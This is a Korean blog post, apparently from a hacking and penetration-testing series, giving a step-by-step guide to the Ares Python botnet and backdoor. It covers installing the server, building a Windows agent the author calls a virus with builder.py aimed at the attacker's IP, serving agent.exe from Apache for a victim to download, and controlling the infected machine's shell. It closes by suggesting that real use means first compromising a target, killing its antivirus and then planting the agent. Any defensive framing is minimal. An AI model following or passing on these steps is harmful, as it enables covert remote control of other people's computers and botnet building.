https://github.com/sweetsoftware/Ares
GitHub - sweetsoftware/Ares: Python botnet and backdoor
Python botnet and backdoor. Contribute to sweetsoftware/Ares development by creating an account on GitHub.
github.com
git clone으로 다운받아줍니다.
[설치법]
>pip install -r requirements.txt
>cd server
>./ares.py initdb
(윈도우 에이전트 사용시)
./wine_setup.sh
[사용법]
서버 : ./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
-h 옵션에 해커의 아이피를 넣어줍니다.
서버가 오픈되었으면 해당 아이피와 포트번호로 서버가 오픈됨이 표시됩니다.
해당 주소를 브라우저에 넣고 접속합니다.
비밀번호를 설정합니다.
그 후 passphrase에 만든 비번을 넣고 접속하면 관리자 페이지로 갑니다.
클라이언트:Ares의 agent 폴더 안의 config.py를 leafpad로 열어줍니다.
세팅을 본인에 맞게 맞춰줍니다. [주소를 자기아이피:8080으로 변경]
그리고 윈도우용 에이전트(바이러스)를 생성해 주어야 하는데요.
agent폴더로 갑니다.
>./builder.py -p Windows --server http://192.168.0.8:8080 -o agent.exe 으로 바이러스 파일을 만듭니다.
그 후 agent.exe 파일을 /var/www/html에 넣어줍니다.
>service apache2 start - 아파치 틀어줍니다.
>그 후 피해자 컴퓨터에서 http://192.168.0.8/agent.exe 하면 다운로드 받아지겠죠
다운 후 실행하면 아레스 서버 브라우저에 세션이 잡힙니다. [백신 끄셔야합니다.]
세션을 클릭하면 검은 창이 뜨는데 해당 감염 컴퓨터의 터미널입니다.
여러개의 컴퓨터를 감염시켰다면 하나하나가 봇넷이 되는것이고
해커의 통제하에 명령어가 작동되게 되겠죠.
명령어는 윈도우 명령어입니다.
help-명령어 종류 확인, url 다운로드,업로드, 파이썬프로그램 실행, 스크린샷 등 많은 작업이 가능합니다.
dir - 디렉터리 확인
systeminfo-시스템 정보 확인
zip hi.zip agent.exe - agent.exe 파일을 hi.zip파일을 만들어 압축안에 넣습니다.
clean-에이전트를 삭제합니다.
많은 백신이 이 바이러스를 감지하기때문에 실로 활용하려면 우선 해킹을 한 후 통제권을 얻은 상태에서
강제로 백신을 종료시키고 이 바이러스를 투입하여 활용할것 같습니다.
'2. 시스템 해킹 및 모의 해킹' 카테고리의 다른 글
| 윈도우 계정 아이디와 비밀번호 해킹 [hydra와 nmap] (0) | 2023.12.27 |
|---|---|
| winrar sfx를 활용한 압축파일 자동 dll인젝션 (0) | 2023.12.27 |
| 자동 악성코드 제작 툴 Hercules (0) | 2023.12.27 |
| FATRAT - 파일을 트로이목마로 변경하기 (0) | 2023.12.27 |
| 키로거 Beelogger 설치 및 사용법 (0) | 2023.12.27 |
